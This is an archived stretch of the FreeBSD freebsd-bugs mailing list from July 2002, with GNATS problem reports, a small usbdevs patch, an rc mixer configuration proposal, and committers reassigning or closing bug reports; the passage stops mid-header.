From owner-freebsd-bugs Sun Jul 28 2:10:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9BF9C37B400 for ; Sun, 28 Jul 2002 02:10:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id E1B3B43E42 for ; Sun, 28 Jul 2002 02:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6S9A1JU063907 for ; Sun, 28 Jul 2002 02:10:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6S9A1Nk063906; Sun, 28 Jul 2002 02:10:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 05A3537B400 for ; Sun, 28 Jul 2002 02:04:03 -0700 (PDT) Received: from mail.demos.su (relay1.demos.su [194.87.0.16]) by mx1.FreeBSD.org (Postfix) with ESMTP id EDF6A43E3B for ; Sun, 28 Jul 2002 02:04:01 -0700 (PDT) (envelope-from mitya@mitya.mitya.static.dol.ru) Received: from [194.87.5.172] (HELO mitya.mitya.static.dol.ru) by mail.demos.su (CommuniGate Pro SMTP 3.5.9/D3) with ESMTP-TLS id 28990452 for FreeBSD-gnats-submit@freebsd.org; Sun, 28 Jul 2002 13:03:57 +0400 Received: from mitya.mitya.static.dol.ru (localhost [127.0.0.1]) by mitya.mitya.static.dol.ru (8.12.5/8.11.6) with ESMTP id g6S935Wd000231 for ; Sun, 28 Jul 2002 13:03:05 +0400 (MSD) (envelope-from mitya@mitya.mitya.static.dol.ru) Received: (from mitya@localhost) by mitya.mitya.static.dol.ru (8.12.5/8.12.5/Submit) id g6S933Wd000230; Sun, 28 Jul 2002 13:03:03 +0400 (MSD) Message-Id: <200207280903.g6S933Wd000230@mitya.mitya.static.dol.ru> Date: Sun, 28 Jul 2002 13:03:03 +0400 (MSD) From: Dmitry Sivachenko To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/41081: Add USB device ID for USB Flash disk drive Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41081 >Category: kern >Synopsis: Add USB device ID for USB Flash disk drive >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Jul 28 02:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Dmitry Sivachenko >Release: FreeBSD 4.6-STABLE i386 >Organization: >Environment: System: FreeBSD mitya.mitya.static.dol.ru 4.6-STABLE FreeBSD 4.6-STABLE #0: Sun Jul 28 12:34:30 MSD 2002 mitya@mitya.mitya.static.dol.ru:/usr/obj/usr/src/sys/CAVIA i386 >Description: I have EasyDisk USB flash memory drive: da0 at umass-sim0 bus 0 target 0 lun 0 da0: Removable Direct Access SCSI-2 device da0: 650KB/s transfers da0: 125MB (256000 512 byte sectors: 64H 32S/T 125C) To recognize it correctly by umass and not to print numeric vendor/device IDs, aplly the following patch. >How-To-Repeat: >Fix: --- usbdevs.orig Sun Jul 28 12:22:47 2002 +++ usbdevs Sun Jul 28 12:27:22 2002 @@ -329,6 +329,7 @@ vendor ATI2 0x0b6f ATI vendor AGATE 0x0c08 Agate Technologies vendor DMI 0x0c0b DMI +vendor LUWEN 0x0c76 Luwen vendor MOTOROLA 0x1063 Motorola vendor PLX 0x10b5 PLX vendor ASANTE 0x10bd Asante @@ -765,6 +766,9 @@ /* Lucent products */ product LUCENT EVALKIT 0x1001 USS-720 evaluation kit + +/* Luwen products */ +product LUWEN EASYDISK 0x0005 EasyDisc /* Macally products */ product MACALLY MOUSE1 0x0101 mouse >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 3:25: 4 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F111537B400; Sun, 28 Jul 2002 03:25:01 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3E6E443E6A; Sun, 28 Jul 2002 03:25:01 -0700 (PDT) (envelope-from tjr@FreeBSD.org) Received: from freefall.freebsd.org (tjr@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SAOsJU073443; Sun, 28 Jul 2002 03:24:54 -0700 (PDT) (envelope-from tjr@freefall.freebsd.org) Received: (from tjr@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SAOrTR073439; Sun, 28 Jul 2002 03:24:53 -0700 (PDT) Date: Sun, 28 Jul 2002 03:24:53 -0700 (PDT) From: "Tim J. Robbins" Message-Id: <200207281024.g6SAOrTR073439@freefall.freebsd.org> To: vova@sw.ru, tjr@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/32935: /bin/sh buildin echo command have invalid implimentation of command args parser Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /bin/sh buildin echo command have invalid implimentation of command args parser State-Changed-From-To: patched->closed State-Changed-By: tjr State-Changed-When: Sun Jul 28 03:24:27 PDT 2002 State-Changed-Why: Change has been MFC'd. http://www.freebsd.org/cgi/query-pr.cgi?pr=32935 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 4: 0:18 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E108137B400 for ; Sun, 28 Jul 2002 04:00:12 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A1CFE43E42 for ; Sun, 28 Jul 2002 04:00:12 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SB0CJU076747 for ; Sun, 28 Jul 2002 04:00:12 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SB0C6J076193; Sun, 28 Jul 2002 04:00:12 -0700 (PDT) Date: Sun, 28 Jul 2002 04:00:12 -0700 (PDT) Message-Id: <200207281100.g6SB0C6J076193@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Matthew D. Fuller" Subject: Re: bin/35505: [PATCH] Feature enhancement for sed(1) Reply-To: "Matthew D. Fuller" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/35505; it has been noted by GNATS. From: "Matthew D. Fuller" To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: bin/35505: [PATCH] Feature enhancement for sed(1) Date: Sun, 28 Jul 2002 05:52:39 -0500 If somebody is interested in this functionality, could they commit it? Else, it can probably be closed, since I'm not sufficiently attached to it to fight for it over bde's objection. -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Systems/Network Administrator | http://www.over-yonder.net/~fullermd/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 4:10:13 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3F29337B400 for ; Sun, 28 Jul 2002 04:10:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9AE3343E42 for ; Sun, 28 Jul 2002 04:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SBA2JU084578 for ; Sun, 28 Jul 2002 04:10:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SBA2ki084577; Sun, 28 Jul 2002 04:10:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1BEE737B400 for ; Sun, 28 Jul 2002 04:08:33 -0700 (PDT) Received: from email.seznam.cz (smtp.seznam.cz [212.80.76.43]) by mx1.FreeBSD.org (Postfix) with SMTP id 8FEA443E3B for ; Sun, 28 Jul 2002 04:08:31 -0700 (PDT) (envelope-from neologism@seznam.cz) Received: (qmail 95794 invoked from network); 28 Jul 2002 11:08:28 -0000 Received: from ppp914.brno.worldonline.cz (HELO variola) (212.90.230.137) by smtp.seznam.cz with SMTP; 28 Jul 2002 11:08:28 -0000 Received: from roman by variola with local (Exim 3.13 #1 (Debian)) id 17Ylv5-00009V-00 for ; Sun, 28 Jul 2002 13:09:03 +0200 Message-Id: <20020728130903.A584@variola> Date: Sun, 28 Jul 2002 13:09:03 +0200 From: neologism Reply-To: neologism@seznam.cz To: FreeBSD-gnats-submit@FreeBSD.org Subject: conf/41083: sound configuration Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41083 >Category: conf >Synopsis: sound configuration >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Jul 28 04:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: neologism >Release: FreeBSD 4.6-RELEASE i386 >Organization: home >Environment: System: FreeBSD variola 4.6-RELEASE FreeBSD 4.6-RELEASE #5: Sat Jul 27 15:42:25 GMT 2002 root@variola:/mnt/linux/bsd/compile/MYKERNEL i386 >Description: There is no system-wide sound configuration. I mean rc configuration. I'm sending a (possible) solution. It'd be good to get it integrated >How-To-Repeat: No need to repeat >Fix: mixer configuration in /etc/mixer (or wherever). You get it by "mixer -s > /etc/mixer" command. In /etc/rc is this: case ${sound_conf_enable} in [Yy][Ee][Ss]) if [ -f "${sound_conf}" ]; then echo 'Setting proper sound configuration' mixer `cat ${sound_conf}` > /dev/null fi ;; esac Where $sound_conf_enable and $sound_conf variables are defined in /etc/default/rc.conf (preinitialized to "NO" and "/etc/mixer") >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 5:50: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5BCC237B400 for ; Sun, 28 Jul 2002 05:50:06 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 095A443E31 for ; Sun, 28 Jul 2002 05:50:06 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SCo5JU099541 for ; Sun, 28 Jul 2002 05:50:05 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SCo5c7099539; Sun, 28 Jul 2002 05:50:05 -0700 (PDT) Date: Sun, 28 Jul 2002 05:50:05 -0700 (PDT) Message-Id: <200207281250.g6SCo5c7099539@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Maxim Konovalov Subject: Re: conf/41083: sound configuration Reply-To: Maxim Konovalov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR conf/41083; it has been noted by GNATS. From: Maxim Konovalov To: neologism Cc: bug-followup@FreeBSD.org Subject: Re: conf/41083: sound configuration Date: Sun, 28 Jul 2002 16:42:09 +0400 (MSD) Hello, Have you seen conf/39192? I believe this PR is just a duplicate of it. -- Maxim Konovalov, maxim@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 6:23:44 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 83CEB37B400; Sun, 28 Jul 2002 06:23:42 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 38EFD43E31; Sun, 28 Jul 2002 06:23:42 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: from freefall.freebsd.org (dwmalone@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SDNgJU009081; Sun, 28 Jul 2002 06:23:42 -0700 (PDT) (envelope-from dwmalone@freefall.freebsd.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SDNfRf009073; Sun, 28 Jul 2002 06:23:41 -0700 (PDT) Date: Sun, 28 Jul 2002 06:23:41 -0700 (PDT) From: David Malone Message-Id: <200207281323.g6SDNfRf009073@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, sos@FreeBSD.org Subject: Re: kern/41063: Typo Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Typo Responsible-Changed-From-To: freebsd-bugs->sos Responsible-Changed-By: dwmalone Responsible-Changed-When: Sun Jul 28 06:23:10 PDT 2002 Responsible-Changed-Why: Soren - this is a simple fix for a undersized string buffer. http://www.freebsd.org/cgi/query-pr.cgi?pr=41063 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 6:27: 0 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 86AD637B400; Sun, 28 Jul 2002 06:26:59 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3832D43E4A; Sun, 28 Jul 2002 06:26:59 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: from freefall.freebsd.org (dwmalone@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SDQxJU009261; Sun, 28 Jul 2002 06:26:59 -0700 (PDT) (envelope-from dwmalone@freefall.freebsd.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SDQx1p009257; Sun, 28 Jul 2002 06:26:59 -0700 (PDT) Date: Sun, 28 Jul 2002 06:26:59 -0700 (PDT) From: David Malone Message-Id: <200207281326.g6SDQx1p009257@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, robert@FreeBSD.org Subject: Re: misc/40941: syslogd "!prog" fails for progs with non-alphanumeric characters. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: syslogd "!prog" fails for progs with non-alphanumeric characters. Responsible-Changed-From-To: freebsd-bugs->robert Responsible-Changed-By: dwmalone Responsible-Changed-When: Sun Jul 28 06:26:09 PDT 2002 Responsible-Changed-Why: Robert Drehmel has been dealing with this problem. http://www.freebsd.org/cgi/query-pr.cgi?pr=40941 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 6:32:57 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3977037B400; Sun, 28 Jul 2002 06:32:55 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id DC93B43E65; Sun, 28 Jul 2002 06:32:54 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: from freefall.freebsd.org (dwmalone@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SDWsJU010615; Sun, 28 Jul 2002 06:32:54 -0700 (PDT) (envelope-from dwmalone@freefall.freebsd.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SDWrbC010611; Sun, 28 Jul 2002 06:32:53 -0700 (PDT) Date: Sun, 28 Jul 2002 06:32:53 -0700 (PDT) From: David Malone Message-Id: <200207281332.g6SDWrbC010611@freefall.freebsd.org> To: slchang@csie.nctu.edu.tw, dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/40714: Functions with more than 1 arguments Gets More Executing Time. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Functions with more than 1 arguments Gets More Executing Time. State-Changed-From-To: open->feedback State-Changed-By: dwmalone State-Changed-When: Sun Jul 28 06:31:06 PDT 2002 State-Changed-Why: Can you try Bruce's suggestion of testing gcc 3.1? The old behaviour is a well known interaction between FreeBSD not aligning the stack and gcc assuming the stack is already aligned rather than aligning it itself. http://www.freebsd.org/cgi/query-pr.cgi?pr=40714 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 6:36:59 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 98A2737B400; Sun, 28 Jul 2002 06:36:57 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4ADE943E31; Sun, 28 Jul 2002 06:36:57 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: from freefall.freebsd.org (dwmalone@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SDavJU011273; Sun, 28 Jul 2002 06:36:57 -0700 (PDT) (envelope-from dwmalone@freefall.freebsd.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SDavae011269; Sun, 28 Jul 2002 06:36:57 -0700 (PDT) Date: Sun, 28 Jul 2002 06:36:57 -0700 (PDT) From: David Malone Message-Id: <200207281336.g6SDavae011269@freefall.freebsd.org> To: fullermd@over-yonder.net, dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/35505: [PATCH] Feature enhancement for sed(1) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] Feature enhancement for sed(1) State-Changed-From-To: open->closed State-Changed-By: dwmalone State-Changed-When: Sun Jul 28 06:33:51 PDT 2002 State-Changed-Why: Close this PR due to lack of interest. Peter Pentchev originially expressed some interest in the patch, so if he wants to commit he can reopen the PR. http://www.freebsd.org/cgi/query-pr.cgi?pr=35505 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 7:28:26 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B8C6437B400; Sun, 28 Jul 2002 07:28:25 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 687B243E31; Sun, 28 Jul 2002 07:28:25 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: from freefall.freebsd.org (dwmalone@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SESPJU026146; Sun, 28 Jul 2002 07:28:25 -0700 (PDT) (envelope-from dwmalone@freefall.freebsd.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SESPlO026134; Sun, 28 Jul 2002 07:28:25 -0700 (PDT) Date: Sun, 28 Jul 2002 07:28:25 -0700 (PDT) From: David Malone Message-Id: <200207281428.g6SESPlO026134@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, imp@FreeBSD.org Subject: Re: i386/38919: A Belkin 802.11 PCMCIA card is not recognized Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: A Belkin 802.11 PCMCIA card is not recognized Responsible-Changed-From-To: freebsd-bugs->imp Responsible-Changed-By: dwmalone Responsible-Changed-When: Sun Jul 28 07:27:41 PDT 2002 Responsible-Changed-Why: Another pccard.conf entry for Warner. http://www.freebsd.org/cgi/query-pr.cgi?pr=38919 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 8:20:34 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A5FBD37B401; Sun, 28 Jul 2002 08:20:32 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2785C43E70; Sun, 28 Jul 2002 08:20:32 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: from freefall.freebsd.org (dwmalone@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SFKVJU035463; Sun, 28 Jul 2002 08:20:31 -0700 (PDT) (envelope-from dwmalone@freefall.freebsd.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SFKVtI035459; Sun, 28 Jul 2002 08:20:31 -0700 (PDT) Date: Sun, 28 Jul 2002 08:20:31 -0700 (PDT) From: David Malone Message-Id: <200207281520.g6SFKVtI035459@freefall.freebsd.org> To: keramida@freebsd.org, dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/38930: ANSI-fy main() of src/usr.bin/colldef fixing WARNS=3 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: ANSI-fy main() of src/usr.bin/colldef fixing WARNS=3 State-Changed-From-To: open->closed State-Changed-By: dwmalone State-Changed-When: Sun Jul 28 08:20:14 PDT 2002 State-Changed-Why: Similar patch just applied to -current. http://www.freebsd.org/cgi/query-pr.cgi?pr=38930 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 8:30: 8 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EC9B237B401 for ; Sun, 28 Jul 2002 08:30:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6FF7843E3B for ; Sun, 28 Jul 2002 08:30:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SFU4JU036373 for ; Sun, 28 Jul 2002 08:30:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SFU4DH036372; Sun, 28 Jul 2002 08:30:04 -0700 (PDT) Date: Sun, 28 Jul 2002 08:30:04 -0700 (PDT) Message-Id: <200207281530.g6SFU4DH036372@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Jan Srzednicki Subject: Re: bin/40894: OpenSSH weird delays Reply-To: Jan Srzednicki Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/40894; it has been noted by GNATS. From: Jan Srzednicki To: Peter Pentchev Cc: FreeBSD-gnats-submit@FreeBSD.org Subject: Re: bin/40894: OpenSSH weird delays Date: Sun, 28 Jul 2002 17:25:58 +0200 (CEST) On Tue, 23 Jul 2002, Peter Pentchev wrote: This has been fixed in: http://www.freebsd.org/cgi/query-pr.cgi?pr=39953 Merging the ports patch into -STABLE would be nice. -- Jan 'Winfried' Srzednicki winfried@expro.pl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 9:36:19 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 11A8B37B400; Sun, 28 Jul 2002 09:36:18 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A4D9643E3B; Sun, 28 Jul 2002 09:36:17 -0700 (PDT) (envelope-from mp@FreeBSD.org) Received: from freefall.freebsd.org (mp@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SGaHJU045939; Sun, 28 Jul 2002 09:36:17 -0700 (PDT) (envelope-from mp@freefall.freebsd.org) Received: (from mp@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SGaHBu045935; Sun, 28 Jul 2002 09:36:17 -0700 (PDT) Date: Sun, 28 Jul 2002 09:36:17 -0700 (PDT) From: Mark Peek Message-Id: <200207281636.g6SGaHBu045935@freefall.freebsd.org> To: ahmed_benani@urbanet.ch, mp@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15281: Please fix handling Ross(?) host to PCI bridge Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: Please fix handling Ross(?) host to PCI bridge State-Changed-From-To: feedback->closed State-Changed-By: mp State-Changed-When: Sun Jul 28 09:34:40 PDT 2002 State-Changed-Why: Feedback timeout. http://www.freebsd.org/cgi/query-pr.cgi?pr=15281 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Jul 28 11:12:43 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 827F737B400; Sun, 28 Jul 2002 11:12:41 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 366D843E4A; Sun, 28 Jul 2002 11:12:41 -0700 (PDT) (envelope-from mp@FreeBSD.org) Received: from freefall.freebsd.org (mp@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g6SICeJU063812; Sun, 28 Jul 2002 11:12:41 -0700 (PDT) (envelope-from mp@freefall.freebsd.org) Received: (from mp@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g6SICeew063807; Sun, 28 Jul 2002 11:12:40 -0700 (PDT) Date: Sun, 28 Jul 2002 11:12:40 -0700 (PDT) From: Mark Peek Message-Id: <200207281812.g6SICeew063807@freefall.freebsd.org> To: jin@panasas.com, mp@FreeBSD.org, freebsd-bugs@FreeBSD.org 